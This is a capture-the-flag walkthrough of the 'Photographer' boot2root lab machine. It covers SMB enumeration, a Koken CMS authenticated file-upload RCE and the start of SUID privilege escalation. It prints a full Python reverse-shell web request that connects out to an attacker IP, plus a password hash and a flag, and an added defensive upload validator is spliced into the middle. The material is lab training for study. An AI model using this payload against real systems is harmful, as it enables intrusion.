This machine was developed to prepare for OSCP. It is boot2root, tested on VirtualBox (but works on VMWare) and has two flags: user.txt and proof.txt.
File. Strangely, it isn't zipped, so it's a 2.6 GB download as an .ova file.
Nmap
We’ve got four ports: SMB (139/445), HTTP on 80 and port 8000. If you guessed that’s a second HTTP port, you’re correct.
SMB
smbclient let me enumerate the shares, but didn’t seem to want to connect to the one we wanted:
But it’s okay, because impacket can help:
From these files, we get something immediately useful:
Webserver
The page on port 8000 seems to be the most interesting one, and it's running a CMS called Koken, which is seemingly designed for photographic content. Running searchsploit shows an Authenticated RCE for a version of it, so that may be what we're after.
gives us a page called /admin that allows login; it wants an email address and a password. We try it with daisa@photographer.com:babygirl and we’re in.
Authenticated RCE
Checking the searchsploit entry, we find that, after logging in, we can upload PHP code in a file with a jpeg extension and then change the file extension in Burp Suite Repeater. So my request looks like this (sorry for the wall of text):
Then we go find that file and send it commands like this:
GET //storage//originals//93//9c//cmd.php?cmd=python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("192.168.1.77",1234))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b' HTTP/1.1
Which gets us a shell.
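The upload check that this exploit bypasses, seen from the defender's side: the server trusts the filename the client sends, so an image uploaded as cmd.jpg can be replayed as cmd.php and land in a web-served directory. The function below is an added Python example, not code from the writeup or from Koken, and validate_upload() and its ALLOWED table are hypothetical; it shows the server-side checks that close the hole (extension allowlist, magic-byte check, rejection of embedded PHP tags, server-generated storage name).

```python
"""Server-side image upload validation (constructed example)."""
import secrets
from pathlib import PurePosixPath

# Allowed extensions mapped to the magic bytes the content must start with.
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def validate_upload(client_name: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, stored_name_or_reason).

    The client-supplied name is only consulted for its final extension;
    the name actually used on disk is generated here, so a replayed
    request with "cmd.php" in the filename cannot choose where or as
    what the bytes are stored.
    """
    # Only the last suffix counts, so "cmd.php.jpg" is judged as ".jpg".
    ext = PurePosixPath(client_name).suffix.lower()
    if ext not in ALLOWED:
        return False, f"extension {ext or '<none>'} not allowed"
    # The bytes must really be the image type the extension claims.
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, f"content does not match {ext} signature"
    # A valid image header followed by a PHP open tag is a polyglot; it is
    # still dangerous if the web server ever executes the file, so reject it.
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded PHP tag"
    stored_name = f"{secrets.token_hex(16)}{ext}"
    return True, stored_name
```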
www-data
We’re on the box as www-data, but we can read the user flag from /home/daisa:
d41d8cd98f00b204e9800998ecf8427e
Now what?
Well, we can get the database credentials from here:
www-data@photographer:/$ mysql --host=127.0.0.1 --port 3306 -u kokenuser -p
Enter password: user_password_here
But the only user is daisa, and we already know her password, so grabbing the hash ($2a$08$ruF3jtzIEZF1JMy/osNYj.ibzEiHWYCE4qsC6P/sMBZorx2ZTSGwK) isn't very helpful.
Privesc
Running linpeas gives us a list of SUID binaries, and one of them is PHP. Although linpeas doesn't highlight it, this is our way in. GTFOBins shows the way: